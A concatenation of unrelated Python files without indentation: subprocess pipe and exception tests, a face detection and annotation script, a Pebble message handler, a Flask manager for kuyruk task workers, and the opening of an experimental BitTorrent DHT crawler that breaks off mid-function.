def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
assertFalse(self._owns_pipe)
def _close_fds(self) -> None:
raise IOError("This would damage the owning pipe")
def __del__(self) -> None:
super().__del__()
del_audit["count"] += 1
pipe = OwnCheckingPipe()
alt_pipe_0 = NonOwnCheckingPipe(read_handle=pipe.read_handle)
alt_pipe_1 = NonOwnCheckingPipe(write_handle=pipe.write_handle)
alt_pipe_2 = NonOwnCheckingPipe(
read_handle=pipe.read_handle,
write_handle=pipe.write_handle,
)
del pipe
del alt_pipe_0
del alt_pipe_1
del alt_pipe_2
# Make sure the tests we expect in __del__ actually ran.
self.assertEqual(del_audit["count"], 4)
class TestSubprocessExceptions(TestCase):
def _test_raise(
self,
raise_type: typing.Type[Exception],
reraise_type: typing.Type[Exception],
) -> None:
try:
raise raise_type("Fail")
except Exception as e:
e_raised = e # `e` is scoped to the `except` block
tb = sys.exc_info()[2]
serialized_e = subprocess_rpc.SerializedException.from_exception(e=e, tb=tb)
with self.assertRaises(reraise_type):
subprocess_rpc.SerializedException.raise_from(serialized_e)
if raise_type is reraise_type:
try:
subprocess_rpc.SerializedException.raise_from(serialized_e)
self.fail("`raise_from` failed to raise.")
except Exception as e:
self.assertEqual(e_raised.args, e.args)
def _test_raise_builtin(self, raise_type: typing.Type[Exception]) -> None:
self._test_raise(raise_type=raise_type, reraise_type=raise_type)
def test_unserializable(self) -> None:
# Make sure we can always get an exception out, even if we can't
# extract any debug info.
serialized_e = subprocess_rpc.SerializedException.from_exception(e=None, tb=None)
with self.assertRaises(subprocess_rpc.UnserializableException):
subprocess_rpc.SerializedException.raise_from(serialized_e)
class MyException(Exception):
pass
class MyIOError(IOError):
pass
self._test_raise(MyException, subprocess_rpc.UnserializableException)
self._test_raise(MyIOError, subprocess_rpc.UnserializableException)
def test_serializable(self) -> None:
self._test_raise_builtin(Exception)
self._test_raise_builtin(AssertionError)
self._test_raise_builtin(IOError)
self._test_raise_builtin(NameError)
self._test_raise_builtin(ValueError)
if __name__ == '__main__':
run_tests()
|
find_face.py
|
#coding:utf-8
import datetime
from itertools import count
import os
import re
import shutil
import time
import face_recognition
import cv2
import matplotlib.pyplot as plt
import sys
from PIL import Image, ImageDraw
from pathlib import Path
import random
import dlib
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import Process
from threading import Thread
from PyQt5.QtWidgets import QApplication, QWidget, QMessageBox
import qdarkstyle
import numpy as np
class readfile():
def __init__(self) -> None:
self.files = []
def allfile(self, path) -> None:
if os.path.isdir(path):
files = os.listdir(path)
for file in files:
new_file = path+'/'+file
if os.path.isdir(new_file):
self.allfile(new_file)
else:
self.files.append(new_file)
else:
self.files.append(path)
def listfiles(self, path) -> list:
path = self.format_path(path)
self.allfile(path)
return self.files
def format_path(self, path) -> str:
path = os.path.abspath(path)
path = path.replace('\\', '/')
path = path.replace('//', '/')
path = path[:-1] if path[-1] == '/' else path
return path
def last_path(self, path) -> str:
path = path[path.rfind('/')+1:]
return path
def sub_path(self, path, rootpath) -> str:
path = path[path.find(rootpath)+len(rootpath):]
path = path[1:] if path[0] == '/' else path
return path
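# Usage sketch (illustrative, not part of the original script; paths are
# hypothetical): readfile recursively collects every file under a directory.
#
#   rf = readfile()
#   images = rf.listfiles('C:/Users/example/photos')
#   # -> ['C:/Users/example/photos/a/1.jpg', 'C:/Users/example/photos/b/2.jpg', ...]
#   rf.last_path(images[0])                               # -> '1.jpg'
#   rf.sub_path(images[0], 'C:/Users/example/photos')     # -> 'a/1.jpg'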
# face_recognition docs: https://github.com/ageitgey/face_recognition/blob/master/README_Simplified_Chinese.md
class Findface():
def find_face_cv2(self, img_path, pass_dir, fail_dir):
# Read the source image
img = cv2.imread(img_path)
# Load an OpenCV Haar cascade classifier for the feature type to detect:
# face  - haarcascade_frontalface_default.xml
# eyes  - haarcascade_eye.xml
# smile - haarcascade_smile.xml
face_detect = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
# Detect faces: scale the search window by 1.1 per step, require at least 5 neighbors
face_zone = face_detect.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5)
# print('Detected face info:', face_zone)
if type(face_zone) != tuple:
print(f"{img_path} {'='*10} pass")
return True
if not os.path.exists(pass_dir): os.makedirs(pass_dir)
Image.open(img_path).convert('RGB').save(f"{pass_dir}{random.randint(1, 10000000000)}.jpg")
# # Draw rectangles and circles around the detected faces
# for x, y, w, h in face_zone:
# # Draw a rectangular face region; thickness is the line width
# cv2.rectangle(img, pt1=(x, y), pt2=(x+w, y+h),color=[0,0,255], thickness=2)
# # Draw a circular face region; radius is the circle radius
# cv2.circle(img, center=(x+w//2, y+h//2), radius=w//2, color=[0,255,0], thickness=2)
# # Allow the display window to be resized manually
# cv2.namedWindow("Easmount-CSDN", 0)
# # Show the image
# cv2.imshow("Easmount-CSDN", img)
# # Wait for a key press; any key closes the window
# cv2.waitKey(0)
# cv2.destroyAllWindows()
else:
print(f"{img_path} {'='*10} fail")
return False
if not os.path.exists(fail_dir): os.makedirs(fail_dir)
Image.open(img_path).convert('RGB').save(f"{fail_dir}{random.randint(1, 10000000000)}.jpg")
def find_face_fr(self, img_path, pass_dir, fail_dir):
image=face_recognition.load_image_file(img_path)
face_locations=face_recognition.face_locations(image)
face_num2=len(face_locations)
# print(face_num2)
if face_num2:
print(f"{img_path} {'='*10} pass")
return True
if not os.path.exists(pass_dir): os.makedirs(pass_dir)
Image.open(img_path).convert('RGB').save(f"{pass_dir}{random.randint(1, 10000000000)}.jpg")
# org=cv2.imread(img_path)
# for i in range(0,face_num2):
# top=face_locations[i][0]
# right=face_locations[i][1]
# bottom=face_locations[i][2]
# left=face_locations[i][3]
# start=(left,top)
# end=(right,bottom)
# color=(0,255,0)
# thickness=5
# img=cv2.rectangle(org,start,end,color,thickness)
# plt.imshow(img)
# plt.axis("off")
# plt.show()
if face_num2 == 0:
print(f"{img_path} {'='*10} fail")
return False
if not os.path.exists(fail_dir): os.makedirs(fail_dir)
Image.open(img_path).convert('RGB').save(f"{fail_dir}{random.randint(1, 10000000000)}.jpg")
# cv2.imshow("Easmount-CSDN", image)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
def mkdir(self, path):
path = re.findall("(.*/)", path)[0]
print("Current path:", path)
folder = os.path.exists(path)
if not folder:
os.makedirs(path)
print("#"*50)
print("Created new directory at: {}".format(path))
print("#"*50)
def writeFile(self, path, file):
self.mkdir(path)
with open(path, 'w', encoding='UTF-8') as f:
f.write(file)
print("Successfully wrote file to: {}".format(path))
return path
def mark_face_detail(self, path):
try:
image = face_recognition.load_image_file(path)
# Find all facial features for every face in the image
face_landmarks_list = face_recognition.face_landmarks(image)
face_landmarks = face_landmarks_list[0]
except Exception as error:
print("No face could be detected!!!!")
return False
allx = 0
ally = 0
for i in face_landmarks['right_eye']:
allx += i[0]
ally += i[1]
lex = round(allx/len(face_landmarks['right_eye']))
ley = round(ally/len(face_landmarks['right_eye']))
# print("left eye:", lex, ley, '\n', "**"*40)
allx = 0
ally = 0
for i in face_landmarks['left_eye']:
allx += i[0]
ally += i[1]
rex = round(allx/len(face_landmarks['left_eye']))  # average over the left_eye points summed above
rey = round(ally/len(face_landmarks['left_eye']))
# print("right eye:", rex, rey, '\n', "**"*40)
nsx = face_landmarks['nose_bridge'][-1][0]
nsy = face_landmarks['nose_bridge'][-1][1]
# print("nose:", nsx, nsy, '\n', "**"*40)
maxt = max(face_landmarks['top_lip'])
maxb = max(face_landmarks['bottom_lip'])
lm = maxt if maxt == maxb else max([maxt, maxb])
lmx = lm[0]
lmy = lm[1]
# print("left lip:", lmx, lmy, '\n', "**"*40)
mint = min(face_landmarks['top_lip'])
minb = min(face_landmarks['bottom_lip'])
rm = mint if mint == minb else min([mint, minb])
rmx = rm[0]
rmy = rm[1]
# print("right lip:", rmx, rmy, '\n', "**"*40)
ffpfile = f"LEX {lex}\nLEY {ley}\nREX {rex}\nREY {rey}\nNSX {nsx}\nNSY {nsy}\nLMX {lmx}\nLMY {lmy}\nRMX {rmx}\nRMY {rmy}"
# print(ffpfile)
filename = readfile().last_path(path)
filename = filename.replace('jpg', 'ffp')
dir = '{}/Downloads/FFP/{}'.format(str(Path.home()), filename)
self.writeFile(dir, ffpfile)
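# For reference (not part of the original code): mark_face_detail writes one
# .ffp text file per image into ~/Downloads/FFP/, using the layout built above.
# A hypothetical output looks like:
#
#   LEX 210
#   LEY 182
#   REX 305
#   REY 184
#   NSX 258
#   NSY 240
#   LMX 300
#   LMY 290
#   RMX 215
#   RMY 292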
def show_face_mark(self, path):
path = readfile().format_path(path)
image = face_recognition.load_image_file(path)
# Find all facial features for every face in the image
face_landmarks_list = face_recognition.face_landmarks(image)
# print("I found {} face(s) in this photograph.".format(len(face_landmarks_list)))
if not face_landmarks_list:
print("No face could be detected!!!!")
return False
face_landmarks = face_landmarks_list[0]
# Print the location of each facial feature in this image
facial_features = [
'chin',
'nose_bridge',
'left_eye',
'right_eye',
'top_lip',
'bottom_lip'
]
for facial_feature in facial_features:
print("The {} in this face has the following points: {}".format(facial_feature, face_landmarks[facial_feature]))
# Facial landmark points gathered above
print("**"*40)
# Trace each facial feature onto the image!
pil_image = Image.fromarray(image)
d = ImageDraw.Draw(pil_image)
for facial_feature in facial_features:
d.line(face_landmarks[facial_feature], width=1)
pil_image.show()
def unit_mark_face_detail(self, paths):
for path in paths:
self.mark_face_detail(path)
def multprocess(self, path):
path = readfile().format_path(path)
paths = readfile().listfiles(path)
start = datetime.datetime.now()
length = len(paths)
p1 = []
p2 = []
p3 = []
p4 = []
p5 = []
for i in range(length):
if i < round(length/5):
p1.append(paths[i])
elif i >= round(length/5) and i <(2*round(length/5)):
p2.append(paths[i])
elif i >= (2*round(length/5)) and i < (3*round(length/5)):
p3.append(paths[i])
elif i >= (3*round(length/5)) and i < (4*round(length/5)):
p4.append(paths[i])
else:
p5.append(paths[i])
multp = [p1,p2,p3,p4,p5]
# q = Queue()
process_list = []
for i in multp:
print("Starting worker process")
p = Process(target=self.unit_mark_face_detail,args=(i,))
p.start()
process_list.append(p)
for p in process_list:
p.join()
end = datetime.datetime.now()
print(f"Total images: {length} {'*'*10} elapsed: {(end - start).seconds} s {'*'*10} throughput: {round(length/int((end - start).seconds))} images/s")
app = QApplication([])
self.Tips("Face landmark annotation finished\nFiles were saved to the Downloads folder")
def unit_find_face(self, pathlist, pass_dir, fail_dir, mode):
ps = []
fl = []
coun = 1
if mode == 'fr':
for path in pathlist:
if self.find_face_fr(path, pass_dir, fail_dir):
ps.append(path)
else:
fl.append(path)
print(f"Recognition progress: {coun} / {len(pathlist)}")
coun += 1
if mode == 'cv2':
for path in pathlist:
if self.find_face_cv2(path, pass_dir, fail_dir):
ps.append(path)
else:
fl.append(path)
print(f"Recognition progress: {coun} / {len(pathlist)}")
coun += 1
for i in ps:
if not os.path.exists(pass_dir): os.makedirs(pass_dir)
Image.open(i).convert('RGB').save(f"{pass_dir}{random.randint(1, 10000000000)}.jpg")
for i in fl:
if not os.path.exists(fail_dir): os.makedirs(fail_dir)
Image.open(i).convert('RGB').save(f"{fail_dir}{random.randint(1, 10000000000)}.jpg")
def multp_find_face(self, path, tmpfile):
start = datetime.datetime.now()
# use fr to check the face
path = readfile().format_path(path)
paths = readfile().listfiles(path)
fail_dir = '{}/Downloads/finish_fail/'.format(str(Path.home()))
# pass_dir_fr = 'fr_pass/'
pass_dir_fr = tmpfile
length = len(paths)
p1 = []
p2 = []
p3 = []
p4 = []
p5 = []
p6 = []
for i in range(length):
if i < round(length/6):
p1.append(paths[i])
elif i >= round(length/6) and i <(2*round(length/6)):
p2.append(paths[i])
elif i >= (2*round(length/6)) and i < (3*round(length/6)):
p3.append(paths[i])
elif i >= (3*round(length/6)) and i < (4*round(length/6)):
p4.append(paths[i])
elif i >= (4*round(length/6)) and i < (5*round(length/6)):
p5.append(paths[i])
else:
p6.append(paths[i])
multp = [p1,p2,p3,p4,p5,p6]
process_list = []
for i in multp:
print("Starting worker process")
p = Process(target=self.unit_find_face,args=(i,pass_dir_fr,fail_dir,'fr',))
p.start()
process_list.append(p)
for p in process_list:
p.join()
# use cv2 to check face
paths = readfile().listfiles(pass_dir_fr)
fail_dir = '{}/Downloads/finish_fail/'.format(str(Path.home()))
pass_dir_cv = '{}/Downloads/final_pass/'.format(str(Path.home()))
length = len(paths)
p1 = []
p2 = []
p3 = []
p4 = []
p5 = []
p6 = []
for i in range(length):
if i < round(length/6):
p1.append(paths[i])
elif i >= round(length/6) and i <(2*round(length/6)):
p2.append(paths[i])
elif i >= (2*round(length/6)) and i < (3*round(length/6)):
p3.append(paths[i])
elif i >= (3*round(length/6)) and i < (4*round(length/6)):
p4.append(paths[i])
elif i >= (4*round(length/6)) and i < (5*round(length/6)):
p5.append(paths[i])
else:
p6.append(paths[i])
multp = [p1,p2,p3,p4,p5,p6]
process_list = []
for i in multp:
print("Starting worker process")
p = Process(target=self.unit_find_face,args=(i,pass_dir_cv,fail_dir,'cv2',))  # second pass uses the cv2 detector
p.start()
process_list.append(p)
for p in process_list:
p.join()
end = datetime.datetime.now()
print(f"Total images: {length} {'*'*10} elapsed: {(end - start).seconds} s {'*'*10} throughput: {round(length/int((end - start).seconds))} images/s")
def deletefile(self, path):
if os.path.isdir(path):
# os.remove(path)
subfiles = readfile().listfiles(path)
pool = ThreadPoolExecutor(max_workers=10)
for file in subfiles:
pool.submit(self.deletefile, file)
pool.shutdown()
shutil.rmtree(path)
print(f"Deleted directory: {path}")
else:
os.remove(path)
# print(f"Deleted file: {path}")
def face(self, path):
tmpfile = str(random.randint(1, 100000000))+'/'
p = Process(target=self.multp_find_face, args=(path,tmpfile,))
p.start()
p.join()
p = Process(target=self.deletefile, args=(tmpfile,))
p.start()
p.join()
app = QApplication([])
self.Tips("Face image cleaning finished\nFiles were saved to the Downloads folder")
# Info dialog
def Tips(self, message):
window = QWidget()
window.setWindowOpacity(0.9) # Set window opacity
window.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5()) # Apply the dark stylesheet
QMessageBox.about(window, "Notice", message)
if __name__ == "__main__":
if sys.argv[1] == 'face':
Findface().face(sys.argv[2])
if sys.argv[1] == 'mark':
path = readfile().format_path(sys.argv[2])
paths = readfile().listfiles(path)
start = datetime.datetime.now()
notfind = []
for i in paths:
# print(i)
if Findface().mark_face_detail(i) == False:
notfind.append(i)
print(f"{len(notfind)} images could not be annotated and need manual review!!!!")
for i in notfind:
print(i)
end = datetime.datetime.now()
print(f"Total images: {len(paths)} {'*'*10} elapsed: {(end - start).seconds} s {'*'*10} throughput: {round(len(paths)/int((end - start).seconds))} images/s")
if sys.argv[1] == 'show':
Findface().show_face_mark(sys.argv[2])
if sys.argv[1] == 'multmark':
Findface().multprocess(sys.argv[2])
if sys.argv[1] == 'delete':
start = datetime.datetime.now()
Findface().deletefile(sys.argv[2])
end = datetime.datetime.now()
print(f"File deletion took {(end-start).seconds} s")
if sys.argv[1] == 'test':
# pool = ThreadPoolExecutor(max_workers=2)
# path = readfile().format_path(sys.argv[2])
# paths = readfile().listfiles(path)
# for i in paths:
# t = pool.submit(mark_face_detail, i)
# # if not t.running():
# # time.sleep(5)
# # print(i)
# pool.shutdown()
# test(sys.argv[2])
# find_face_cv2(r"C:/Users/cn-wilsonshi/Downloads/finish_fail/3480549624.jpg", '.', '.')
Findface().deletefile(sys.argv[2])
# face_detail(r"C:/Users/cn-wilsonshi/Downloads/old_version/glasses/20.jpg")
|
IncomingMessageService.py
|
from Logics.BluetoothManager import BluetoothManager
from data import ServerEnvelope, PebbleCommand
from services.IncomingPebbleMessageService import IncomingPebbleMessageService
from injector import inject, singleton
import threading
class IncomingMessageService(object):
@singleton
@inject(bluetoothManager = BluetoothManager, incomingPebbleMessageService = IncomingPebbleMessageService)
def __init__(self, bluetoothManager, incomingPebbleMessageService):
self._bluetoothManager = bluetoothManager
self._incomingPebbleMessageService = incomingPebbleMessageService
def HandleIncomingMessage(self, message):
if self._readMessageFromServer(message) == False: return False
def _readMessageFromServer(self, message):
try:
messageList = message.split(',')
messageList = list(filter(None, messageList))
except:
return False
if(self._checkServerMessage(messageList) == False):
return False
def _checkServerMessage(self, message):
"""Check type of received webservice message and handle accordingly"""
envelopeType = int(message[0])
envelopeTypes = ServerEnvelope.ServerEnvelopeType
if(envelopeType == envelopeTypes.scan.value):
"""Scan for Pebbles"""
self._HandleScanCommand()
return
if(envelopeType == envelopeTypes.install.value):
"""Install Pebble application"""
targetPebble = message[1]
url = message[2]
envelope = self._HandleInstallCommand(targetPebble, url)
elif(envelopeType == envelopeTypes.connect.value) or (envelopeType == ServerEnvelope.ServerEnvelopeType.disconnect.value):
"""Connect/Disconnect Pebble"""
targetPebble = message[1]
envelope = self._HandleConnectionCommand(envelopeType, targetPebble)
elif(envelopeType == envelopeTypes.message.value):
"""Send message to a specific Pebble application"""
envelope = self._HandleMessagingCommand(message)
elif(envelopeType == envelopeTypes.notification.value):
"""Send notification to Pebble. This message will pop-up regardless of opened application"""
targetPebble = message[1]
notification = message[2]
envelope = self._HandleNotificationCommand(targetPebble, notification)
else: return False
self._incomingPebbleMessageService.sendMessageToPebble(envelope)
def _HandleScanCommand(self):
"""Scan for available pebbles"""
scanThread = threading.Thread(target=self._bluetoothManager.sendAvailablePebblesToServer)
scanThread.start()
def _HandleInstallCommand(self, targetPebble, url):
"""Download pebble app from given url and install it on given Pebble"""
return ServerEnvelope.ServerEnvelope(ServerEnvelope.ServerEnvelopeType.install.value, target = targetPebble, data = url)
def _HandleConnectionCommand(self, envelopeType, targetPebble):
"""Notify webservice of pebble connection/disconnect"""
return ServerEnvelope.ServerEnvelope(envelopeType, targetPebble)
def _HandleMessagingCommand(self, message):
"""Check type of message to be delivered to Pebble"""
targetPebble = message[1]
messageType = int(message[2])
messageString = message[3]
if(messageType == 1):
listItems = message[4]
transactionId = message[5]
return ServerEnvelope.ServerEnvelope( ServerEnvelope.ServerEnvelopeType.message.value, targetPebble, messageType, data = messageString, note = listItems, uniqueID = transactionId)
else:
transactionID = message[4]
return ServerEnvelope.ServerEnvelope(envelopeType = ServerEnvelope.ServerEnvelopeType.message.value, target = targetPebble, messageType = messageType, data = messageString, uniqueID = transactionID)
def _HandleNotificationCommand(self, targetPebble, notification):
"""Send notification to the given Pebble"""
return ServerEnvelope.ServerEnvelope(ServerEnvelope.ServerEnvelopeType.notification.value, targetPebble, data = notification)
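# Illustrative sketch (not part of the original service): the server sends a
# plain comma-separated string whose first field is the ServerEnvelopeType
# value and whose remaining fields are positional arguments, as parsed by
# _readMessageFromServer/_checkServerMessage. Field values below are
# hypothetical.
#
#   service.HandleIncomingMessage("<notification_type>,<pebble_id>,Hello from the server")
#   # -> builds a notification ServerEnvelope for <pebble_id> and hands it to
#   #    IncomingPebbleMessageService.sendMessageToPebble()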
|
__init__.py
|
from __future__ import division
import os
import json
import socket
import logging
import operator
import threading
from datetime import datetime, timedelta
from time import sleep
from functools import total_ordering, wraps, partial
import amqp
from flask import Flask, Blueprint
from flask import render_template, redirect, request, url_for, jsonify
import waitress
import kuyruk
from kuyruk.signals import worker_start, worker_shutdown
logger = logging.getLogger(__name__)
CONFIG = {
"MANAGER_LISTEN_HOST_HTTP": "127.0.0.1",
"MANAGER_LISTEN_PORT_HTTP": 16500,
"MANAGER_STATS_INTERVAL": 1,
"SENTRY_PROJECT_URL": None,
}
ACTION_WAIT_TIME = 1 # seconds
def start_thread(target, args=(), daemon=False, stop_event=threading.Event()):
target = _retry(stop_event=stop_event)(target)
t = threading.Thread(target=target, args=args)
t.daemon = daemon
t.start()
return t
def _retry(sleep_seconds=1, stop_event=threading.Event(),
on_exception=lambda e: logger.error(e)):
def decorator(f):
@wraps(f)
def inner(*args, **kwargs):
while not stop_event.is_set():
try:
f(*args, **kwargs)
except Exception as e:
if on_exception:
on_exception(e)
if sleep_seconds:
sleep(sleep_seconds)
return inner
return decorator
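# Usage sketch (illustrative only; names are hypothetical): _retry keeps
# re-invoking the wrapped callable, logging any exception and sleeping between
# attempts, until the given stop_event is set; start_thread applies it
# automatically.
#
#   stop = threading.Event()
#   def poll_broker():
#       ...  # may raise; the wrapper logs the error and retries after sleep_seconds
#   t = start_thread(poll_broker, daemon=True, stop_event=stop)
#   ...
#   stop.set()   # the loop exits once the current attempt finishes
#   t.join()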
def _connect(worker):
def handle_manager_message(message):
logger.info("Action received from manager: %s", message.body)
message = json.loads(message.body)
action = message['action']
handlers = {
'warm_shutdown': worker.shutdown,
'cold_shutdown': partial(os._exit, 0),
'quit_task': worker.drop_task,
}
try:
handler = handlers[action]
except KeyError:
logger.error("Unknown action: %s", action)
return
handler()
with worker.kuyruk.channel() as ch:
ch.basic_consume('amq.rabbitmq.reply-to', no_ack=True,
callback=handle_manager_message)
while not worker._manager_connector_stopped.is_set():
stats = _get_stats(worker)
body = json.dumps(stats)
msg = amqp.Message(body=body, type='stats',
reply_to='amq.rabbitmq.reply-to')
ch.basic_publish(msg, routing_key='kuyruk_manager')
try:
ch.connection.heartbeat_tick()
ch.connection.drain_events(
timeout=worker.kuyruk.config.MANAGER_STATS_INTERVAL)
except socket.timeout:
pass
msg = amqp.Message(type='shutdown', reply_to='amq.rabbitmq.reply-to')
ch.basic_publish(msg, routing_key='kuyruk_manager')
def start_connector(sender, worker=None):
worker._manager_connector_stopped = threading.Event()
worker._manager_connector_thread = start_thread(
_connect, args=(worker, ),
stop_event=worker._manager_connector_stopped)
def stop_connector(sender, worker=None):
worker._manager_connector_stopped.set()
worker._manager_connector_thread.join()
class Manager:
def __init__(self, kuyruk):
self.kuyruk = kuyruk
self.workers = {}
self.lock = threading.Lock()
self.requeue = kuyruk.extensions.get("requeue")
self.has_sentry = "sentry" in kuyruk.extensions
if self.has_sentry and not kuyruk.config.SENTRY_PROJECT_URL:
raise Exception("SENTRY_PROJECT_URL is not set")
worker_start.connect(start_connector, sender=kuyruk, weak=False)
worker_shutdown.connect(stop_connector, sender=kuyruk, weak=False)
kuyruk.extensions["manager"] = self
def _accept(self):
with self.kuyruk.channel() as ch:
ch.queue_declare('kuyruk_manager', exclusive=True)
ch.basic_consume('kuyruk_manager', no_ack=True,
callback=self._handle_worker_message)
while True:
try:
ch.connection.heartbeat_tick()
ch.connection.drain_events(timeout=1)
except socket.timeout:
pass
def _handle_worker_message(self, message):
message_type = message.type
reply_to = message.reply_to
if message_type == 'stats':
stats = json.loads(message.body)
with self.lock:
try:
worker = self.workers[reply_to]
except KeyError:
worker = _Worker(reply_to, stats)
self.workers[reply_to] = worker
else:
worker.update(stats)
elif message_type == 'shutdown':
with self.lock:
try:
del self.workers[reply_to]
except KeyError:
pass
def _clean_workers(self):
while True:
sleep(self.kuyruk.config.MANAGER_STATS_INTERVAL)
with self.lock:
now = datetime.utcnow()
for worker in list(self.workers.values()):
if now - worker.updated_at > timedelta(seconds=10):
del self.workers[worker.reply_to]
def flask_blueprint(self):
b = Blueprint("kuyruk_manager", __name__)
b.add_url_rule('/', 'index', self._get_index)
b.add_url_rule('/workers', 'workers', self._get_workers)
b.add_url_rule('/failed-tasks', 'failed_tasks',
self._get_failed_tasks)
b.add_url_rule('/api/failed-tasks', 'api_failed_tasks',
self._api_get_failed_tasks)
b.add_url_rule('/action', 'action',
self._post_action, methods=['POST'])
b.add_url_rule('/action-all', 'action_all',
self._post_action_all, methods=['POST'])
b.add_url_rule('/requeue', 'requeue_task',
self._post_requeue, methods=['POST'])
b.add_url_rule('/delete', 'delete_task',
self._post_delete, methods=['POST'])
b.context_processor(self._context_processors)
return b
def flask_application(self):
app = Flask(__name__)
app.debug = True
app.register_blueprint(self.flask_blueprint())
return app
def _get_index(self):
return redirect(url_for('kuyruk_manager.workers'))
def _get_workers(self):
hostname = request.args.get('hostname')
queue = request.args.get('queue')
consuming = request.args.get('consuming')
working = request.args.get('working')
workers = {}
with self.lock:
for reply_to, worker in self.workers.items():
if hostname and hostname != worker.stats.get('hostname', ''):
continue
if queue and queue not in worker.stats.get('queues', []):
continue
if consuming and not worker.stats.get('consuming', False):
continue
if working and not worker.stats.get('current_task', None):
continue
workers[reply_to] = worker
return render_template('workers.html', workers=workers)
def _failed_tasks(self):
tasks = self.requeue.redis.hvals('failed_tasks')
tasks = [t.decode('utf-8') for t in tasks]
decoder = json.JSONDecoder()
tasks = map(decoder.decode, tasks)
return tasks
def _get_failed_tasks(self):
tasks = list(self._failed_tasks())
return render_template('failed_tasks.html', tasks=tasks)
def _api_get_failed_tasks(self):
return jsonify(tasks=self._failed_tasks())
def _post_action(self):
body = json.dumps({'action': request.form['action']})
msg = amqp.Message(body)
with self.kuyruk.channel() as ch:
ch.basic_publish(msg, '', request.args['id'])
sleep(ACTION_WAIT_TIME)
return redirect_back()
def _post_action_all(self):
body = json.dumps({'action': request.form['action']})
msg = amqp.Message(body)
with self.kuyruk.channel() as ch:
with self.lock:
for id in self.workers:
ch.basic_publish(msg, '', id)
sleep(ACTION_WAIT_TIME)
return redirect_back()
def _post_requeue(self):
task_id = request.form['task_id']
redis = self.requeue.redis
if task_id == 'ALL':
self.requeue.requeue_failed_tasks()
else:
failed = redis.hget('failed_tasks', task_id)
failed = json.loads(failed)
self.requeue.requeue_task(failed)
return redirect_back()
def _post_delete(self):
task_id = request.form['task_id']
self.requeue.redis.hdel('failed_tasks', task_id)
return redirect_back()
def _context_processors(self):
return {
'manager': self,
'now': str(datetime.utcnow())[:19],
'hostname': socket.gethostname(),
'has_requeue': self.requeue is not None,
'has_sentry': self.has_sentry,
'sentry_url': self._sentry_url,
'human_time': self._human_time,
}
def _sentry_url(self, sentry_id):
if not sentry_id:
return
url = self.kuyruk.config.SENTRY_PROJECT_URL
if not url.endswith('/'):
url += '/'
url += '?query=%s' % sentry_id
return url
def _human_time(self, seconds, suffixes=['y', 'w', 'd', 'h', 'm', 's'],
add_s=False, separator=' '):
"""
Takes an amount of seconds and
turns it into a human-readable amount of time.
"""
# the formatted time string to be returned
time = []
# the pieces of time to iterate over (days, hours, minutes, etc)
# the first piece in each tuple is the suffix (d, h, w)
# the second piece is the length in seconds (a day is 60s * 60m * 24h)
parts = [
(suffixes[0], 60 * 60 * 24 * 7 * 52),
(suffixes[1], 60 * 60 * 24 * 7),
(suffixes[2], 60 * 60 * 24),
(suffixes[3], 60 * 60),
(suffixes[4], 60),
(suffixes[5], 1)]
# for each time piece, grab the value and remaining seconds,
# and add it to the time string
for suffix, length in parts:
value = seconds // length
if value > 0:
seconds %= length
time.append('%s%s' % (str(value), (
suffix, (suffix, suffix + 's')[value > 1])[add_s]))
if seconds < 1:
break
return separator.join(time)
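# Worked example (for reference, not in the original module): with the default
# suffixes, 90061 seconds is 1 day + 1 hour + 1 minute + 1 second, so
# self._human_time(90061) returns '1d 1h 1m 1s'; the loop stops early once the
# remaining seconds drop below 1.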
def redirect_back():
referrer = request.headers.get('Referer')
if referrer:
return redirect(referrer)
return 'Go back'
_hostname = socket.gethostname()
_pid = os.getpid()
def _get_stats(worker):
return {
'hostname': _hostname,
'uptime': int(worker.uptime),
'pid': _pid,
'version': kuyruk.__version__,
'current_task': getattr(worker.current_task, "name", None),
'current_args': worker.current_args,
'current_kwargs': worker.current_kwargs,
'consuming': worker.consuming,
'queues': worker.queues,
}
@total_ordering
class _Worker:
def __init__(self, reply_to, stats):
self.reply_to = reply_to
self.update(stats)
def __lt__(self, other):
a, b = self._sort_key, other._sort_key
return _lt_tuples(a, b)
@property
def _sort_key(self):
order = ('hostname', 'queues', 'uptime', 'pid')
return operator.itemgetter(*order)(self.stats)
def update(self, stats):
self.stats = stats
self.updated_at = datetime.utcnow()
def _lt_tuples(t1, t2):
for i in range(min(len(t1), len(t2))):
a, b = t1[i], t2[i]
if not a:
return False
if not b:
return True
return a < b
def run_manager(kuyruk, args):
manager = kuyruk.extensions["manager"]
app = manager.flask_application()
start_thread(manager._accept, daemon=True)
start_thread(manager._clean_workers, daemon=True)
waitress.serve(
app,
host=kuyruk.config.MANAGER_LISTEN_HOST_HTTP,
port=kuyruk.config.MANAGER_LISTEN_PORT_HTTP)
help_text = "see and manage kuyruk workers"
command = (run_manager, help_text, None)
|
crawler.py
|
#!/usr/bin/env python
#
# This script is experimental.
#
# Liang Wang @ Dept. Computer Science, University of Helsinki
# 2011.09.20
#
import os, sys
import socket
import pickle
import Queue
import random
import time
import threading
import resource
from khash import *
from bencode import bencode, bdecode
from common import *
CTTIME = 10
class Crawler(object):
def __init__(self, id = None):
self.noisy = True # Output extra info or not
self.id = id if id else newID() # Injector's ID
self.ip = get_myip() # my ip
self.port = get_port(30000, 31000) # my listening port
self.krpc = KRPC() # Simple KRPC translator
self.nodePool = {} # Dict of the nodes collected
self.addrPool = {} # Dict uses <ip,port> as its key
self.nodeQueue = Queue.Queue(0) # Queue of the nodes to scan
self.counter = CTTIME # How long to wait after a queue is empty
self.startTime = time.time() # Time start the crawler
self.duplicates = 0 # How many duplicates among returned nodes
self.total = 1 # Total number of returned nodes
self.respondent = 0 # Number of respondents
self.tn = 0 # Number of nodes in a specified n-bit zone
self.tnold = 0
self.tntold = 0
self.tnspeed = 0
self.isock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.isock.bind( ("",self.port) )
self.isock_lock = threading.Lock()
pass
def ping(self, host, port):
msg = self.krpc.encodeReq("ping", {"id":self.id})
Transport(host, port, msg, self.dataComeIn).start()
pass
def findNode(self, host, port, target):
msg = self.krpc.encodeReq("find_node", {"id":self.id, "target":target})
self.isock.sendto(msg, (host,port))
pass
def processNodes(self, nodes):
timestamp = time.time()
for node in nodes:
id = node["id"]
node["timestamp"] = timestamp
node["rtt"] = float('inf')
if id not in self.nodePool:
self.nodePool[id] = [node]
self.convergeSpeed(node)
if id != self.id:
self.nodeQueue.put(node)
else:
